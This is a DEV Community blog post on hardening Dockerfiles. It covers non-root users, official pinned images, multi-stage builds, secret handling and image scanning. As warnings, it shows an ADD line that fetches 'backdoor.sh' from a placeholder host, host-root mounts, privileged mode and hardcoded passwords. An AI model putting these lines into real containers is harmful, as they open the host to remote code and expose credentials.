DEV Community

Cover image for Stop shipping insecure Dockerfiles: real devs don’t run as root
Devlink Tips
Devlink Tips

Posted on

Stop shipping insecure Dockerfiles: real devs don’t run as root

From base image blunders to run-time disasters let’s lock down that container before it escapes the lab.

Introduction: Your Dockerfile is a ticking time bomb unless you secure it

Dockerfiles are like spells simple to write, powerful in execution, and incredibly easy to screw up. You write 10 lines, ship it to production, and boom, you’re running a containerized service in the cloud. Feels magical, right? Well, that magic comes with a curse: insecurity by default.

Here’s the thing Docker doesn’t stop you from doing dumb stuff. It happily lets you:

  • Run everything as root
  • Add shady scripts from the internet
  • Bake secrets into the image
  • And pull a 2GB Ubuntu base image just to run curl.

If you’re guilty of any of these, don’t worry we’ve all been there. But it’s 2025, and the internet is way less forgiving. One misconfigured Dockerfile can be a hacker’s golden ticket into your infrastructure.

In this guide, we’ll walk through practical, battle-tested Dockerfile security best practices. No corporate nonsense just real talk for developers who want to stop rolling containers like they’re spinning a roulette wheel.

Let’s fix that Dockerfile before it becomes a DocuHell.

Section 2: The root of all evil don’t run containers as root

Let’s get this out of the way: if your Docker container runs as root, you’re basically handing out the admin keys to anyone who finds a way in. In the early Docker days, we all did it. It was convenient. Fast. Harmless... until it wasn’t.

Running as root inside a container doesn’t magically isolate you from the host. Sure, containers aren’t VMs, but they share the host’s kernel. That means a container breakout vulnerability (like CVE-2019–5736) could allow malicious code inside your container to execute commands on the host as root. Let that sink in.

Even worse, if you’re mounting volumes (-v /:/host) or using privileged mode (--privileged), you're basically saying:

“Come on in, feel free to rm -rf /, I trust you.”

✅ The fix: Use a non-root user

Here’s how to properly sandbox your app:

Dockerfile
# Create a new user and switch to it
RUN addgroup --system appgroup && adduser --system appuser --ingroup appgroup
USER appuser

Or better, use an official image that already comes with a non-root user:

Dockerfile
FROM node:18-alpine
USER node

Dev pro tip:

  • Running as non-root might require fixing file permissions on volumes (chown -R appuser:appgroup /app) or setting the right WORKDIR.
  • Some tools (especially ones that bind to low ports like 80 or 443) may not work without root use higher ports and handle redirection at the reverse proxy level.

Section 3: Use trusted base images or welcome the chaos

So you’ve installed Node, Python, or Java in your Docker image, everything’s working, and you’re feeling like a 10x engineer.
But wait did you check where that base image came from?
If you pulled some random node:latest from Docker Hub and called it a day, congrats you might’ve just invited malware into your production stack.

Why untrusted base images are a disaster waiting to happen

A shady base image can:

  • Contain outdated or vulnerable packages,
  • Be bloated with unused dependencies,
  • Or worse have deliberate backdoors.

And yes, this has happened. In 2021, researchers found hundreds of malicious images on Docker Hub with cryptominers, obfuscated scripts, and spyware.

Even if it’s not evil, many unofficial images are just… badly made. Think of them like GitHub gists from 2013 with no documentation or updates. Would you trust that in prod?

The fix: Use slim, official, and verified images

Here’s how to make smarter choices:

  • ✅ Use official images from Docker (library/) when possible Example: node:18-alpine, python:3.11-slim, nginx:stable
  • ✅ Consider distroless images (by Google) to reduce attack surface These have no package manager, no shell, no fluff — just your app

https://github.com/GoogleContainerTools/distroless

  • ✅ Use digest pinning to lock the image to a specific, verified hash

Dockerfile:

FROM node@sha256:123abc... # instead of node:latest

Dev pro tip:

Use trusted sources like:

Section 4: Keep it lean smaller images = smaller attack surface

Let’s be honest your Docker image doesn’t need to be a bloated 1.5GB Debian monster just to serve a static website. That’s like wearing plate armor to a water gun fight. Not only does it slow down your CI/CD pipelines, but it also opens more doors for attackers.

The bigger your image, the more stuff it contains, and the more chances something inside is vulnerable. Each binary, each library, and each config file could be a potential entry point.

Why size matters (in Docker)

  • Longer build & pull times = slower deployments
  • More packages = more CVEs
  • Harder to audit = more surprises in docker scan

Want to cut the fat? Then let’s go ninja mode.

The fix: Multi-stage builds & minimal bases

Here’s what a better Dockerfile looks like using multi-stage builds:

Dockerfile
# Stage 1: Build
FROM node:18-alpine AS builder
WORKDIR /app
COPY . .
RUN npm ci && npm run build

# Stage 2: Production
FROM nginx:alpine
COPY --from=builder /app/dist /usr/share/nginx/html

Boom you just kept Node and all build tools out of production. The final image only contains static files and a tiny NGINX server.

Want to go even more lean? Try using:

  • alpine (5MB base)
  • busybox (bare minimum)
  • distroless (no shell, no package manager hackers hate this trick)

Dev pro tip:

Use COPY instead of ADD unless you absolutely need remote URL fetching or auto-unpacking archives.
ADD is like using eval() in JavaScript. It does too much, and that’s dangerous.

Dockerfile
# Good
COPY myfile.txt /app/

# Suspicious
ADD http://someurl.com/backdoor.sh /app/

Keep your containers lean, mean, and boring and hackers will get bored too.

Section 5: Environment variables and secrets stop hardcoding passwords

Let’s play a game:
🫵 You show me your Dockerfile, and I’ll tell you where your database password is.

Because if you’re using ENV DB_PASSWORD=supersecret123, congrats—you’ve just hardcoded your secrets into the image and handed out free root access to anyone who pulls it. 🔓

And it gets worse. These secrets:

  • Are visible in image layers (docker history)
  • Show up in container logs
  • Can be extracted with basic inspection tools

You wouldn’t post your root password on Twitter, right? Then why leave it inside an image that gets pushed to Docker Hub?

The wrong way (aka “how to get hacked 101”)

Dockerfile
ENV DB_USER=root
ENV DB_PASSWORD=supersecret

Please, no.

The secure way to manage secrets

Use runtime environment variables

Pass secrets at runtime instead of baking them into the image:

docker run -e DB_USER=admin -e DB_PASSWORD=$DB_PASSWORD myapp

Use .env files locally, but never commit them.

Use secret management tools

Clean your build context

Use .dockerignore to prevent accidentally copying your local secrets or .env files into your image:

node_modules
.env
.pem
.key

Bonus: Build-time secrets (with BuildKit)

If you’re using Docker BuildKit (which you should), you can securely pass secrets to the build phase without exposing them in layers:

DOCKER_BUILDKIT=1 docker build --secret id=mysecret,src=mysecret.txt .

In your Dockerfile:

# syntax=docker/dockerfile:1.2
RUN --mount=type=secret,id=mysecret cat /run/secrets/mysecret

Now we’re talking hacker-proof containers.

Section 6: Pin your versions or watch your build blow up

Here’s a Docker horror story:
You deploy a perfectly working container to production using node:latest.
A week later, without changing a single line of code, your build starts failing. Or worse your app crashes.
Why?
Because latest moved on, but your code didn’t.

Using unpinned versions is like depending on your ex to still answer your calls it’s unreliable, unpredictable, and eventually painful.

Why pinning matters

  • latest isn’t stable it changes whenever the publisher updates it.
  • Builds become non-reproducible you can’t guarantee the same result over time.
  • New versions might introduce breaking changes or vulnerabilities.

And don’t even get me started on using apt-get install somepackage without pinning the version. One update later and you’re debugging version conflicts for hours. Been there, hated it.

The fix: Pin all the things

Pin your base images:

# BAD
FROM node:latest
# BETTER
FROM node:18-alpine
# BEST (reproducible builds)
FROM node@sha256:abc123... # Use digests for ultra-stability

Pin your dependencies

In Node.js:

npm ci   # uses package-lock.json for exact versions

In Python:

pip install -r requirements.txt  # with exact versions

In Linux:

Dockerfile
RUN apt-get install -y nginx=1.18.*  # be specific

Use lockfiles, dependency managers, or even tools like pip-tools, poetry, or npm shrinkwrap to control what versions go in.

Dev pro tip:

If you really want reproducibility, pin the entire image with a digest hash (you can get this via docker pull node:18-alpine --quiet or from Docker Hub under the tags tab). That way, even if node:18-alpine changes upstream, your build won’t.

Section 7: Scan your Dockerfile and image before pushing

You wouldn’t push code without running tests (hopefully). So why are you pushing containers without checking them for vulnerabilities?

Think of container scanning as your linter for security. It tells you things like:

  • “Hey, that base image has 43 CVEs.”
  • “You’re installing outdated libraries with known exploits.”
  • “This container has enough attack surface to be a CTF challenge.”

And no, you don’t need an expensive enterprise tool to do this. There are amazing open-source scanners that work right from your terminal.

Tools that make image scanning easy

Trivy

Fast, free, and packed with features.

trivy image myapp:latest

Finds:

  • OS package vulnerabilities
  • Misconfigured Dockerfiles
  • Embedded secrets

Snyk

Free for individuals, CI integration-friendly, and dev-friendly.

snyk test --docker myapp:latest

🐳 Docker Scout

Docker’s official tool for vulnerability tracking.

docker scout quickview myapp:latest

Automate it in CI/CD

Add scanning as a step in your GitHub Actions or GitLab CI:

# .github/workflows/security.yml
jobs:
docker-scan:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
- name: Run Trivy vulnerability scanner
uses: aquasecurity/trivy-action@master
with:
image-ref: 'myapp:latest'

This makes sure nobody slips a vulnerable image into your registry on a sleepy Friday afternoon.

Dev pro tip:

Also scan your Dockerfile using hadolint:

hadolint Dockerfile

It’ll yell at you for doing insecure stuff like:

  • Using ADD instead of COPY
  • Not using USER
  • Installing without --no-cache

Section 8: Final checklist the Dockerfile security cheat code

Okay, we’ve been through the trenches:
Bad base images, root users, bloated containers, secret leaks you name it.
Now it’s time to tighten it all up like a proper dev boss with a checklist you can slap on every project like a cheat code.

Here’s your no-BS Dockerfile security checklist — print it, commit it, tattoo it on your CI pipeline:

Dockerfile security checklist

User & permissions

  • Do NOT run containers as root
  • Use USER directive with a non-privileged user
  • Fix permissions for mounted volumes or created directories

Base image

  • Use official or verified images
  • Prefer minimal images (alpine, distroless, slim)
  • Pin base image versions or use digests

Image size & build

  • Use multi-stage builds to keep production images lean
  • Avoid unnecessary packages
  • Use COPY instead of ADD unless needed
  • Use .dockerignore to exclude junk and secrets

Secrets & environment

  • Never hardcode secrets using ENV
  • Use runtime variables, .env, or secret managers
  • Use Docker BuildKit for build-time secrets

Scanning & auditing

  • Scan images using Trivy, Snyk, or Docker Scout
  • Lint Dockerfiles with hadolint
  • Automate scanning in CI/CD pipelines

Dependency hygiene

  • Lock dependency versions (package-lock.json, requirements.txt, etc.)
  • Avoid latest tags
  • Keep dependencies updated & minimal

Pro dev move: Turn this into a GitHub template

Create a docker-check.sh script, add it to pre-commit or CI, and never let an insecure Dockerfile sneak into your repo again.

Section 9: Conclusion why Dockerfile security isn’t optional anymore

Let’s be real Docker is awesome. It lets us spin up environments in seconds, ship apps with zero config, and feel like cloud wizards. But with great power comes great potential for… catastrophe.

An insecure Dockerfile isn’t just a DevOps problem.”
It’s a you problem, especially when:

  • That image leaks a production database password
  • Your app gets popped through a container breakout
  • Or your CI pipeline starts mining crypto for someone in Eastern Europe

The good news? You don’t need to be a cybersecurity expert to write secure Dockerfiles.
Just follow the basics:

  • Don’t run as root.
  • Don’t trust random images.
  • Don’t bake secrets into your containers.
  • Do scan and pin like your job depends on it (because it does).

Security isn’t flashy but when done right, it’s invisible.
And in a world of zero-day exploits and supply chain attacks, invisibility is underrated.

So the next time someone says “It’s just a Dockerfile, relax,”
you show them this checklist and say:

“Yeah… and it’s just a wide-open port in production. What could go wrong?”

Helpful resources

Top comments (3)

Collapse
 
shifa_2 profile image
Shifa

🚀 Great article! I really enjoyed your insights. Let's support each other on our coding journeys — feel free to follow me, and I’ll follow back!

Check my latest article ->
dev.to/shifa_2/stop-letting-javasc...

Collapse
 
spo0q profile image
spO0q

Docker security is a common concern.

Many configurations use root for convenience while it extends the attack surface drastically.

Collapse
 
nadeem_zia_257af7e986ffc6 profile image
nadeem zia

Good information given